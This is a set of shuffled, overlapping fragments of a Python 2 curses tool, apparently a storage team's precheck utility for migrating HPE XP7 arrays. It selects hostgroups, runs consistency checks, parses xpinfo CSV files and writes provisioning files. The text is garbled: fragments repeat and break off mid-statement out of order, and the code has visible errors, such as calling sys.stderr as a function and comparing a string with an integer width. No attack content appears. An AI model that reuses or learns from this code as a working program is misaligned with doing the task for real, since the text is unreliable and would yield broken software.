"0 self.slice_end = self.slice_start + self.slice_len elif n > 0: if self.slice_end -",
"curses.doupdate() for index,item in enumerate(self.display_list): if len(item) >= self.width: item = item[:self.width-1] if",
"0: if self.slice_end - self.position < 2 and self.slice_end < len(self.filtered_items) - 1:",
"self.slice_start = 0 self.slice_len = min(len(self.filtered_items)-1,self.heigth-6) self.slice_end = self.slice_start + self.slice_len self.window.keypad(1) self.panel",
"= self.window.getmaxyx() ### items is a dict ### self.items = items self.filtered_items =",
"line = \"{}: \".format(self.text) if line >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) curses.echo()",
"panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0 self.items = items self.items.append((\"exit\",\"exit\")) def navigate(self,n): self.position",
"if n < 0: if self.slice_start >= 1: self.slice_start += n if self.slice_start",
"hostgroup_name in hostgroup_name_list: hba_wwn_list = box_dict[box_name].get_hostgroup_hba_wwns(hostgroup_name) for hba_wwn in hba_wwn_list: if len(hba_wwn.nickname.split(\"_\")) >",
"slice ### if self.slice_start <= index <= self.slice_end: self.window.addstr(1+(index-self.slice_start),2,line,mode) key = self.window.getch() if",
"for hostgroup_name in hostgroup_name_list: hba_wwn_list = box_dict[box_name].get_hostgroup_hba_wwns(hostgroup_name) for hba_wwn in hba_wwn_list: if len(hba_wwn.nickname.split(\"_\"))",
"key = self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"Y\"),ord(\"y\")]: ### write out the ldevs to",
"in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]: if self.position == len(self.items) - 1: break else: self.items[self.position][1]() elif key",
"object created for box {} :\".format(box_name)) logger.info(box_dict[box_name]) ##################### ### start menu ### #####################",
"serial_nbr in serial_nbr_set: ldev_dict[serial_nbr] = set() ### process the selected xpinfo file ###",
"exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\") sys.exit(1) if box_name in serialnbr_dict: serial_nbr = serialnbr_dict[box_name]",
"curses.doupdate() self.reply = self.window.getstr() ### after we received the response ### self.update_object.set(self.reply) self.window.clear()",
"StorageTeam VERSION : Based on previous ODR framework 1.0 Initial version 1.1 Curses",
"ShowConsistencyMenu(menu_win,selection,consistent,stdscr) main_menu_items.append((\"Show HOSTGROUPs consistency check results\",hostgroup_consistency.display)) main_menu_items.append((\"Clear HOSTGROUP selection\",selection.clear)) main_menu_items.append((\"Clear consistent HOSTGROUP\",consistent.clear)) write_prov",
"down ### self.slice_end += n if self.slice_end > len(self.xpinfo_file_list) - 1: self.slice_end =",
"in instance_dict: instance_nbr = instance_dict[box_name] else: err_msg = \"No HORCM instance nbr defined",
"box_dict[box_name].test_hostgroup_exists(hostgroup_name): sf = os.path.join(self.map_dir,\"{}_{}.prov\".format(box_name,hostgroup_name)) with open(sf,\"wt\") as sfh: box_dict[box_name].print_provisioning(hostgroup_name,sfh) self.window.addstr(2,2,\"Written..\") else: self.window.addstr(2,2,\"Cancelled..\") self.window.clear()",
"### items is a dict ### self.items = items self.filtered_items = copy.copy(self.items.keys()) self.filtered_items.append(\"exit\")",
"n if self.slice_start < 0: self.slice_start = 0 self.slice_end = self.slice_start + self.slice_len",
"set() select_item_dict[\"{}-{}\".format(box_name,sel_item)].add((box_name,hostgroup_name)) hg_by_host_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select by HOSTNAME\",hg_by_host_menu.display)) ### select hostgroups by name",
"linelen = 100 boxpair_dict = {} serialnbr_dict = {} instance_dict = {} site_dict",
"break else: # self.items = {\"select_str\":[(boxpair_name,hostgroup_name),...]} # self.selection.add(self.items[self.filtered_items[self.position]]) for add_item in self.items[self.filtered_items[self.position]]: self.selection.add(add_item)",
":: update items to match search all\") self.filtered_items = copy.copy(self.items.keys()) self.filtered_items.append(\"exit\") self.slice_start =",
"self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class ShowConsistencyMenu(object): def __init__(self,window,selection,consistent,stdscr): self.window = window self.selection",
"S/N, added to ldev_dict, now at {} elements\".format(len(ldev_dict[serial_nbr]))) else: logger.error(\"XPINFO: line too short",
"and self.slice_end < len(self.filtered_items) - 1: ### slide slice down ### self.slice_end +=",
"window self.selection = selection self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.display_list = []",
"line = \"{}: {}\".format(index,item[0]) line = \"{}\".format(item[0]) if len(line) >= self.width: line =",
"xpinfo file\".format(serial_nbr,ldev_nbr)) if serial_nbr in ldev_dict: ldev_dict[serial_nbr].add(ldev_nbr) logger.debug(\"XPINFO: known S/N, added to ldev_dict,",
"len(self.display_list) - 1 self.slice_start = self.slice_end - self.slice_len def display(self): self.panel.top() self.panel.show() self.window.clear()",
"Curses menu structure added 1.2 Add search term criteria 1.3 Add config file",
"self.slice_start = 0 self.slice_end = self.slice_start + self.slice_len self.position = 0 def navigate(self,n):",
"to the selection\".format(box_name,hostgroup_name)) self.selection.add((box_name,hostgroup_name)) elif key == curses.KEY_UP: self.navigate(-1) elif key == curses.KEY_DOWN:",
"= cfg.get(\"dir\",\"log\") except: sys.stderr.write(\"log file dir not defined, exiting..\\n\") sys.exit(1) try: xpinfo_dir =",
"30 try: log_size = cfg.getint(\"log\",\"maxsize\") except: log_size = 100000000 try: log_versions = cfg.getint(\"log\",\"maxversions\")",
"sorted(boxpair_dict.keys()): select_item_dict = {} for box_name in boxpair_dict[boxpair_name]: hostgroup_name_list = box_dict[box_name].get_hostgroups() for hostgroup_name",
"= row[0] device_name = row[1] ldev_nbr = xp7.standard_format_ldev(row[5]) serial_nbr = int(row[8]) logger.debug(\"XPINFO: got",
"for box_name in boxpair_dict[boxpair_name]: hostgroup_name_list = box_dict[box_name].get_hostgroups() for hostgroup_name in hostgroup_name_list: hba_wwn_list =",
"# line = \"{}: {}\".format(index,item[0]) line = \"{}\".format(item[0]) if len(line) >= self.width: line",
"if len(hba_wwn.nickname.split(\"_\")) > 1: sel_item = hba_wwn.nickname.split(\"_\")[0] else: sel_item = hba_wwn.nickname if \"{}-{}\".format(box_name,sel_item)",
"curses.doupdate() ### show the list of xpinfo files ### for index,item in enumerate(self.xpinfo_file_list):",
"position = {}, n = {}\".format(self.position,n )) ### adjust slice ### if n",
"<NAME> / StorageTeam VERSION : Based on previous ODR framework 1.0 Initial version",
"# line = \"{}: {}\".format(index,item) line = \"{}\".format(item) if len(line) >= self.width: line",
"box_dict[box_name].get_hostgroup_consistency(hostgroup_name) self.display_list.extend(report) if result: self.consistent.add((box_name,hostgroup_name)) logger.info(\"{}-{} added to consistent hostgroup list during consistency",
"os.path.join(self.map_dir,\"{}_{}.prov\".format(box_name,hostgroup_name)) with open(sf,\"wt\") as sfh: box_dict[box_name].print_provisioning(hostgroup_name,sfh) self.window.addstr(2,2,\"Written..\") else: self.window.addstr(2,2,\"Cancelled..\") self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate()",
"if os.path.exists(self.xpinfo_dir): del(self.xpinfo_file_list[:]) self.xpinfo_file_list = [f for f in os.listdir(self.xpinfo_dir) if os.path.isfile(\"{}/{}\".format(self.xpinfo_dir,f)) and",
"fh = logging.handlers.RotatingFileHandler(logfile,maxBytes=log_size,backupCount=log_versions) formatter = logging.Formatter(\"%(asctime)s %(levelname)s %(message)s\",\"%Y/%m/%d-%H:%M:%S\") fh.setFormatter(formatter) logger.addHandler(fh) logger.info(\"#\" * linelen)",
"len(self.xpinfo_file_list): self.position = len(self.xpinfo_file_list) - 1 if n < 0: if self.position -",
"logging.Formatter(\"%(asctime)s %(levelname)s %(message)s\",\"%Y/%m/%d-%H:%M:%S\") fh.setFormatter(formatter) logger.addHandler(fh) logger.info(\"#\" * linelen) logger.info(\"XPMIG PRECHECK started\") logger.info(\"#\" *",
"name,value in cfg.items(\"serialnbr\"): serialnbr_dict[name.upper()] = int(value) for name,value in cfg.items(\"instance\"): instance_dict[name.upper()] = int(value)",
"cfg.items(\"instance\"): instance_dict[name.upper()] = int(value) for name,value in cfg.items(\"site\"): site_dict[name.upper()] = value for name,value",
"xpinfo_file_reader: if len(row) > 8: hostname = row[0] device_name = row[1] ldev_nbr =",
"### slide slice up ### self.slice_start += n if self.slice_start < 0: self.slice_start",
"= curses.A_STANDOUT else: mode = curses.A_NORMAL line = \"{}\".format(item) if len(line) >= self.width:",
"SEARCH string\",search.clear)) ### select hostgroups by box ### for boxpair_name in sorted(boxpair_dict.keys()): select_item_dict",
"elif key == curses.KEY_DOWN: self.navigate(1) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class InputMenu(object): def __init__(self,window,text,upd_obj,stdscr):",
"### stdscr.clear() ### check window heigth and width ### if curses.COLS < 20",
"in boxpair_dict[boxpair_name]: hostgroup_name_list = box_dict[box_name].get_hostgroups() for hostgroup_name in hostgroup_name_list: if hostgroup_name not in",
"curses.doupdate() def add(self,item): current_set = set(self.consistent) current_set.add(item) self.consistent = list(sorted(current_set)) self.display() def clear(self):",
"is a view on the items which fits in the window ### self.slice_start",
"### with open(\"{}/{}\".format(self.xpinfo_dir,self.xpinfo_file_list[self.position]),\"rt\") as f: xpinfo_file_reader = csv.reader(f,delimiter=\",\",quotechar=\"'\") for row in xpinfo_file_reader: if",
"file processing CONFIG : xpmig.ini LOG : xpmig_precheck.log TODO : add generate temporary",
"ldev_dict[serial_nbr].add(ldev_nbr) logger.debug(\"XPINFO: known S/N, added to ldev_dict, now at {} elements\".format(len(ldev_dict[serial_nbr]))) else: logger.error(\"XPINFO:",
"== len(self.filtered_items) - 1: break else: # self.items = {\"select_str\":[(boxpair_name,hostgroup_name),...]} # self.selection.add(self.items[self.filtered_items[self.position]]) for",
"self.slice_start + self.slice_len self.position = 0 def navigate(self,n): self.position += n if self.position",
"slice down ### self.slice_end += n if self.slice_end > len(self.xpinfo_file_list) - 1: self.slice_end",
"self.position = 0 elif self.position >= len(self.filtered_items): self.position = len(self.filtered_items) - 1 logger.debug(\"Select_Menu.navigate",
"elif key == curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class ShowWriteProvisionMenu(object): def __init__(self,window,consistent,map_dir,stdscr):",
"def __init__(self,window,consistent,map_dir,stdscr): self.window = window self.consistent = consistent self.map_dir = map_dir self.window.keypad(1) self.panel",
"self.position >= len(self.filtered_items): self.position = len(self.filtered_items) - 1 logger.debug(\"Select_Menu.navigate :: position = {},",
"know what to display ### self.slice_start = 0 self.slice_len = min(len(self.display_list),self.heigth-6) self.slice_end =",
"- 1: self.slice_end = len(self.display_list) - 1 self.slice_start = self.slice_end - self.slice_len def",
"DOWN <B> BACK\",curses.A_BOLD) ### define menu_win ### menu_win = stdscr.subwin(curses.LINES-13,curses.COLS,3,0) # menu_win.border() main_menu_items",
"= logging.getLogger(\"xpmig_precheck\") logger.setLevel(log_level) fh = logging.handlers.RotatingFileHandler(logfile,maxBytes=log_size,backupCount=log_versions) formatter = logging.Formatter(\"%(asctime)s %(levelname)s %(message)s\",\"%Y/%m/%d-%H:%M:%S\") fh.setFormatter(formatter) logger.addHandler(fh)",
"S/N {} LDEV {} from xpinfo file\".format(serial_nbr,ldev_nbr)) if serial_nbr in ldev_dict: ldev_dict[serial_nbr].add(ldev_nbr) logger.debug(\"XPINFO:",
"#################################################################################################### #################################################################################################### ### CLASSES #################################################################################################### class Menu(object): def __init__(self,window,items,stdscr): self.window = window self.heigth,self.width",
"line = line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate() def add(self,item): current_set = set(self.selection) current_set.add(item)",
"CA check ### result,report = box_dict[box_name].get_hostgroup_consistency(hostgroup_name) self.display_list.extend(report) if result: self.consistent.add((box_name,hostgroup_name)) logger.info(\"{}-{} added to",
"string\",input_search.display)) main_menu_items.append((\"Clear SEARCH string\",search.clear)) ### select hostgroups by box ### for boxpair_name in",
"else: logger.debug(\"{}-{} does not exists\".format(box_name,hostgroup_name)) ### now we know what to display ###",
"self.consistent = list(sorted(current_set)) self.display() def clear(self): del self.consistent[:] self.display() def get(self): return self.consistent",
"config file {}, exiting..\".format(mandatory_section,configfile)) sys.exit(1) for name,value in cfg.items(\"boxpair\"): boxpair_dict[name.upper()] = value.split(\",\") for",
"self.display_list = [] for box_name,hostgroup_name in self.selection.get(): self.display_list.extend(box_dict[box_name].get_hostgroup_noluns(hostgroup_name)) ### now we know what",
"self.window.clear() line = \"{}: \".format(self.text) if line >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line)",
"selection self.hostgroup_summary = [] self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.display_list = []",
"{} for boxpair_name in sorted(boxpair_dict.keys()): for box_name in boxpair_dict[boxpair_name]: hostgroup_name_list = box_dict[box_name].get_hostgroups() for",
"framework 1.0 Initial version 1.1 Curses menu structure added 1.2 Add search term",
"select_item_dict: select_item_dict[\"{}-{}\".format(box_name,sel_item)] = set() select_item_dict[\"{}-{}\".format(box_name,sel_item)].add((box_name,hostgroup_name)) hg_by_host_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select by HOSTNAME\",hg_by_host_menu.display)) ### select",
"logger.debug(\"SelectMenu.display :: about to addstr line {}\".format(line)) if self.slice_start <= index <= self.slice_end:",
"[] for box_name,hostgroup_name in self.selection.get(): self.display_list.extend(box_dict[box_name].get_hostgroup_noluns(hostgroup_name)) ### now we know what to display",
"line = line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate() def set(self,search_str): self.search_str = search_str self.display()",
"self.heigth,self.width = self.window.getmaxyx() self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.text = text self.reply",
"### CLASSES #################################################################################################### class Menu(object): def __init__(self,window,items,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx()",
"1: ### slide slice down ### self.slice_end += n if self.slice_end > len(self.filtered_items)",
"### define consistent_win ### consistent_win = stdscr.subwin(3,curses.COLS,curses.LINES-4,0) consistent = Consistent(consistent_win,\"CONSISTENT HOSTGROUP(s)\",stdscr) consistent.display() ###",
"self.position < 0: self.position = 0 elif self.position >= len(self.filtered_items): self.position = len(self.filtered_items)",
"search criteria \"\"\" if self.search.get() != \"\": logger.debug(\"Select_Menu.update :: update items to match",
"Search(object): def __init__(self,window,title,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.title = title self.search_str",
"Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select by HOSTNAME\",hg_by_host_menu.display)) ### select hostgroups by name ### select_item_dict = {}",
"self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]: if self.position == len(self.items) - 1: break else:",
"### define selection_win ### select_win = stdscr.subwin(3,curses.COLS,curses.LINES-7,0) selection = Selection(select_win,\"SELECTED HOSTGROUP(s)\",stdscr) selection.display() ###",
"menu_win = stdscr.subwin(curses.LINES-13,curses.COLS,3,0) # menu_win.border() main_menu_items = [] input_search = InputMenu(menu_win,\"Specify new search",
"self.window = window self.heigth,self.width = self.window.getmaxyx() self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.text",
"self.position = 0 def navigate(self,n): self.position += n if self.position < 0: self.position",
"self.hostgroup_summary = [] self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.display_list = [] def",
"box_dict[box_name].print_provisioning(hostgroup_name,sfh) self.window.addstr(2,2,\"Written..\") else: self.window.addstr(2,2,\"Cancelled..\") self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class Select_Menu(object): def __init__(self,window,items,selection,search,stdscr): self.window",
"for name,value in cfg.items(\"instance\"): instance_dict[name.upper()] = int(value) for name,value in cfg.items(\"site\"): site_dict[name.upper()] =",
"### menu_win = stdscr.subwin(curses.LINES-13,curses.COLS,3,0) # menu_win.border() main_menu_items = [] input_search = InputMenu(menu_win,\"Specify new",
"self.position: mode = curses.A_STANDOUT else: mode = curses.A_NORMAL # line = \"{}: {}\".format(index,item[0])",
"processing CONFIG : xpmig.ini LOG : xpmig_precheck.log TODO : add generate temporary horcm",
"self.display_list.extend(report) if result: self.consistent.add((box_name,hostgroup_name)) logger.info(\"{}-{} added to consistent hostgroup list during consistency check\".format(box_name,hostgroup_name))",
"1.0 Initial version 1.1 Curses menu structure added 1.2 Add search term criteria",
"self.items = {\"select_str\":[(boxpair_name,hostgroup_name),...]} # self.selection.add(self.items[self.filtered_items[self.position]]) for add_item in self.items[self.filtered_items[self.position]]: self.selection.add(add_item) elif key ==",
"at {} elements\".format(len(ldev_dict[serial_nbr]))) else: logger.error(\"XPINFO: line too short to be valid, skipping {}\".format(row))",
"self.slice_end = self.slice_start + self.slice_len self.position = 0 def navigate(self,n): self.position += n",
"select hostgroups by name ### select_item_dict = {} for boxpair_name in sorted(boxpair_dict.keys()): for",
"curses.A_NORMAL # line = \"{}: {}\".format(index,item) line = \"{}\".format(item) if len(line) >= self.width:",
"1: break else: self.items[self.position][1]() elif key == curses.KEY_UP: self.navigate(-1) elif key == curses.KEY_DOWN:",
"string\",search.clear)) ### select hostgroups by box ### for boxpair_name in sorted(boxpair_dict.keys()): select_item_dict =",
"self.slice_start = 0 self.slice_len = min(len(self.display_list),self.heigth-6) self.slice_end = self.slice_start + self.slice_len while True:",
"self.window = window self.heigth,self.width = self.window.getmaxyx() ### items is a dict ### self.items",
"curses.doupdate() for index,item in enumerate(self.filtered_items): if index == self.position: mode = curses.A_STANDOUT else:",
"not defined, exiting..\\n\") sys.exit(1) try: collect_dir = cfg.get(\"dir\",\"collect\") except: sys.stderr.write(\"collect file dir not",
"elif key == curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() #################################################################################################### ### MAIN ####################################################################################################",
"serialnbr_dict.items(): serial_to_name_dict[serial_nbr] = box_name ##################### ### start logging ### ##################### logfile = os.path.join(log_dir,\"xpmig_precheck.log\")",
"#################################################################################################### ### FUNCTIONS #################################################################################################### #################################################################################################### ### CLASSES #################################################################################################### class Menu(object): def __init__(self,window,items,stdscr): self.window",
"else: logger.debug(\"Select_Menu.update :: update items to match search all\") self.filtered_items = copy.copy(self.items.keys()) self.filtered_items.append(\"exit\")",
"logger.debug(\"XPINFO: got S/N {} LDEV {} from xpinfo file\".format(serial_nbr,ldev_nbr)) if serial_nbr in ldev_dict:",
"main_menu_items.append((\"Set SEARCH string\",input_search.display)) main_menu_items.append((\"Clear SEARCH string\",search.clear)) ### select hostgroups by box ### for",
"import copy from ConfigParser import ConfigParser import sys import os import os.path import",
"for box_name,serial_nbr in serialnbr_dict.items(): serial_to_name_dict[serial_nbr] = box_name ##################### ### start logging ### #####################",
"list of xpinfo files ### for index,item in enumerate(self.xpinfo_file_list): if index == self.position:",
"logger.info(\"{}-{} added to consistent hostgroup list during consistency check\".format(box_name,hostgroup_name)) else: logger.error(\"{}-{} not added",
"panel.update_panels() curses.doupdate() class ShowWriteProvisionMenu(object): def __init__(self,window,consistent,map_dir,stdscr): self.window = window self.consistent = consistent self.map_dir",
"= os.path.join(log_dir,\"xpmig_precheck.log\") logger = logging.getLogger(\"xpmig_precheck\") logger.setLevel(log_level) fh = logging.handlers.RotatingFileHandler(logfile,maxBytes=log_size,backupCount=log_versions) formatter = logging.Formatter(\"%(asctime)s %(levelname)s",
"xpinfo_file_reader = csv.reader(f,delimiter=\",\",quotechar=\"'\") for row in xpinfo_file_reader: if len(row) > 8: hostname =",
"self.slice_start >= 1: self.slice_start += n if self.slice_start < 0: self.slice_start = 0",
"self.selection = selection self.search = search def update(self): \"\"\" update the selection items",
"file dir not defined, exiting..\\n\") sys.exit(1) serial_to_name_dict = {} for box_name,serial_nbr in serialnbr_dict.items():",
"= set(self.selection) current_set.add(item) self.selection = list(sorted(current_set)) self.display() def clear(self): del self.selection[:] self.display() def",
"= self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]: break elif key == curses.KEY_UP: self.navigate(-1) elif",
"previous ODR framework 1.0 Initial version 1.1 Curses menu structure added 1.2 Add",
"return self.consistent class ShowSummaryMenu(object): def __init__(self,window,selection,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.selection",
"and re.match(\".+\\.xpinfo$\",f,flags=re.IGNORECASE)] self.xpinfo_file_list.append(\"exit\") self.slice_len = min(len(self.xpinfo_file_list)-1, self.heigth - 6) self.slice_start = 0 self.slice_end",
"cfg.get(\"dir\",\"collect\") except: sys.stderr.write(\"collect file dir not defined, exiting..\\n\") sys.exit(1) try: map_dir = cfg.get(\"dir\",\"map\")",
"in the slice ### # logger.debug(\"SelectMenu.display :: about to addstr line {}\".format(line)) if",
"logger.info(\"#\" * linelen) logger.info(\"XPMIG PRECHECK started\") logger.info(\"#\" * linelen) logger.info(\"Configuration settings :\") logger.info(\"BOXPAIR",
"class ShowSummaryMenu(object): def __init__(self,window,selection,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.selection = selection",
"__init__(self,window,title,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.title = title self.selection = []",
"### check window heigth and width ### if curses.COLS < 20 or curses.LINES",
"open(sf,\"wt\") as sfh: box_dict[box_name].print_provisioning(hostgroup_name,sfh) self.window.addstr(2,2,\"Written..\") else: self.window.addstr(2,2,\"Cancelled..\") self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class Select_Menu(object):",
"< 0: self.position = 0 elif self.position >= len(self.filtered_items): self.position = len(self.filtered_items) -",
"hostgroup list during consistency check\".format(box_name,hostgroup_name)) else: logger.error(\"{}-{} not added to consistent hostgroup list",
"for box_name,hostgroup_name in self.selection.get(): if box_dict[box_name].test_hostgroup_exists(hostgroup_name): ### TODO: add CA check ### result,report",
"self.slice_start = self.slice_end - self.slice_len def display(self): self.panel.top() self.panel.show() self.window.clear() self.update() while True:",
"if self.slice_end < len(self.display_list) - 1: self.slice_end += n if self.slice_end > len(self.display_list)",
"a dict ### self.items = items self.filtered_items = copy.copy(self.items.keys()) self.filtered_items.append(\"exit\") ### slice is",
"min(len(self.filtered_items)-1,self.heigth-6) self.slice_end = self.slice_start + self.slice_len self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position",
"self.slice_end - self.position < 2 and self.slice_end < len(self.filtered_items) - 1: ### slide",
"self.position = 0 self.selection = selection self.search = search def update(self): \"\"\" update",
"0 elif self.position >= len(self.xpinfo_file_list): self.position = len(self.xpinfo_file_list) - 1 if n <",
"self.width: line = line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate() def set(self,search_str): self.search_str = search_str",
"\"xpmig.ini\" cfg = ConfigParser() cfg.read(configfile) for mandatory_section in (\"boxpair\",\"serialnbr\",\"instance\",\"site\",\"collect\",\"dir\"): if not cfg.has_section(mandatory_section): sys.stderr(\"{}",
"= [] for box_name,hostgroup_name in self.selection.get(): if box_dict[box_name].test_hostgroup_exists(hostgroup_name): ### TODO: add CA check",
"self.slice_start = 0 self.slice_len = 0 self.slice_end = 0 self.window.keypad(1) self.panel = panel.new_panel(self.window)",
": Based on previous ODR framework 1.0 Initial version 1.1 Curses menu structure",
"adjust slice ### if n < 0: if self.position - self.slice_start < 2",
"box {} :\".format(box_name)) logger.info(box_dict[box_name]) ##################### ### start menu ### ##################### curses.wrapper(main) logger.info(\"#\" *",
"HOSTGROUP(s)\",stdscr) consistent.display() ### define key_win ### key_win = stdscr.subwin(1,curses.COLS,curses.LINES-1,0) #key_win.clear() #key_win.refresh() #curses.doupdate() key_win.addstr(0,2,\"<ARROW-UP",
"ldev_dict, now at {} elements\".format(len(ldev_dict[serial_nbr]))) else: logger.error(\"XPINFO: line too short to be valid,",
"elif key == curses.KEY_DOWN: self.navigate(1) elif key == curses.KEY_PPAGE: self.navigate(-10) elif key ==",
"serial_nbr_set: ldev_dict[serial_nbr] = set() ### process the selected xpinfo file ### with open(\"{}/{}\".format(self.xpinfo_dir,self.xpinfo_file_list[self.position]),\"rt\")",
"self.position == len(self.filtered_items) - 1: break else: # self.items = {\"select_str\":[(boxpair_name,hostgroup_name),...]} # self.selection.add(self.items[self.filtered_items[self.position]])",
"index == self.position: mode = curses.A_STANDOUT else: mode = curses.A_NORMAL # line =",
"self.slice_end = self.slice_start + self.slice_len self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position =",
"if index == self.position: mode = curses.A_STANDOUT else: mode = curses.A_NORMAL line =",
"logger.info(\"XP7 object created for box {} :\".format(box_name)) logger.info(box_dict[box_name]) ##################### ### start menu ###",
"box_dict[box_name] = xp7.XP7(box_name,instance_nbr,serial_nbr,site,collect_file) logger.info(\"XP7 object created for box {} :\".format(box_name)) logger.info(box_dict[box_name]) ##################### ###",
"logger.debug(\"Select_Menu.navigate :: slide slice down to {}-{}\".format(self.slice_start,self.slice_end )) def display(self): self.panel.top() self.panel.show() self.window.clear()",
"if n < 0: if self.position - self.slice_start < 2 and self.slice_start >=",
"box_dict[box_name].get_hostgroup_hba_wwns(hostgroup_name) for hba_wwn in hba_wwn_list: if len(hba_wwn.nickname.split(\"_\")) > 1: sel_item = hba_wwn.nickname.split(\"_\")[0] else:",
"= self.slice_start + self.slice_len elif n > 0: if self.slice_end < len(self.display_list) -",
"self.window.refresh() curses.doupdate() for index,item in enumerate(self.filtered_items): if index == self.position: mode = curses.A_STANDOUT",
"else: # self.items = {\"select_str\":[(boxpair_name,hostgroup_name),...]} # self.selection.add(self.items[self.filtered_items[self.position]]) for add_item in self.items[self.filtered_items[self.position]]: self.selection.add(add_item) elif",
"hostgroup_dict: for hostgroup_name in hostgroup_dict[box_name]: logger.debug(\"XPINFO processing: adding {}-{} to the selection\".format(box_name,hostgroup_name)) self.selection.add((box_name,hostgroup_name))",
"logger.info(\"SITE NBRs:\") logger.info(site_dict) logger.info(\"COLLECT FILEs:\") logger.info(collectfile_dict) logger.info(\"XPINFO dir: {}\".format(xpinfo_dir)) ######################### ### instantiate boxes",
"match search all\") self.filtered_items = copy.copy(self.items.keys()) self.filtered_items.append(\"exit\") self.slice_start = 0 self.slice_end = self.slice_start",
"import logging.handlers import copy from ConfigParser import ConfigParser import sys import os import",
"#################################################################################################### class Menu(object): def __init__(self,window,items,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.window.keypad(1) self.panel",
"= consistent def navigate(self,n): if n < 0: if self.slice_start >= 1: self.slice_start",
"start logging ### ##################### logfile = os.path.join(log_dir,\"xpmig_precheck.log\") logger = logging.getLogger(\"xpmig_precheck\") logger.setLevel(log_level) fh =",
"if self.slice_start < 0: self.slice_start = 0 self.slice_end = self.slice_start + self.slice_len logger.debug(\"Select_Menu.navigate",
"in self.selection.get(): self.display_list.extend(box_dict[box_name].get_hostgroup_noluns(hostgroup_name)) ### now we know what to display ### self.slice_start =",
"to pairdisplay & check on status #################################################################################################### \"\"\" import curses from curses import",
"len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate() def add(self,item): current_set",
"{} :\".format(box_name)) logger.info(box_dict[box_name]) ##################### ### start menu ### ##################### curses.wrapper(main) logger.info(\"#\" * linelen)",
"curses.LINES < 20: sys.stderr.write(\"Window not large enough, exiting ..\\n\") sys.exit(1) ### define title_win",
"list(sorted(current_set)) self.display() def clear(self): del self.consistent[:] self.display() def get(self): return self.consistent class ShowSummaryMenu(object):",
"which fits in the window ### self.slice_start = 0 self.slice_len = min(len(self.filtered_items)-1,self.heigth-6) self.slice_end",
"self.xpinfo_file_list =[] self.slice_start = 0 self.slice_len = 0 self.slice_end = 0 self.window.keypad(1) self.panel",
"len(self.items) - 1 def display(self): self.panel.top() self.panel.show() self.window.clear() while True: self.window.refresh() curses.doupdate() for",
"up to {}-{}\".format(self.slice_start,self.slice_end )) elif n > 0: if self.slice_end - self.position <",
"for serial_nbr in serial_nbr_set: ldev_dict[serial_nbr] = set() ### process the selected xpinfo file",
"<= self.slice_end: self.window.addstr(1+(index-self.slice_start),2,item,curses.A_NORMAL) key = self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]: break elif key",
"xpinfo files present \"\"\" if os.path.exists(self.xpinfo_dir): del(self.xpinfo_file_list[:]) self.xpinfo_file_list = [f for f in",
"exiting..\\n\") sys.exit(1) try: collect_dir = cfg.get(\"dir\",\"collect\") except: sys.stderr.write(\"collect file dir not defined, exiting..\\n\")",
"in hostgroup_dict[box_name]: logger.debug(\"XPINFO processing: adding {}-{} to the selection\".format(box_name,hostgroup_name)) self.selection.add((box_name,hostgroup_name)) elif key ==",
"= 0 self.slice_end = 0 self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position =",
"= self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"Y\"),ord(\"y\")]: ### write out the ldevs to file",
"check ### result,report = box_dict[box_name].get_hostgroup_consistency(hostgroup_name) self.display_list.extend(report) if result: self.consistent.add((box_name,hostgroup_name)) logger.info(\"{}-{} added to consistent",
"if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"Y\"),ord(\"y\")]: ### write out the ldevs to file ### for",
"self.selection[:] self.display() def get(self): return self.selection class Search(object): def __init__(self,window,title,stdscr): self.window = window",
": xpmig_precheck.log TODO : add generate temporary horcm file and daemon to pairdisplay",
"sys.stderr.write(\"Window not large enough, exiting ..\\n\") sys.exit(1) ### define title_win ### title_win =",
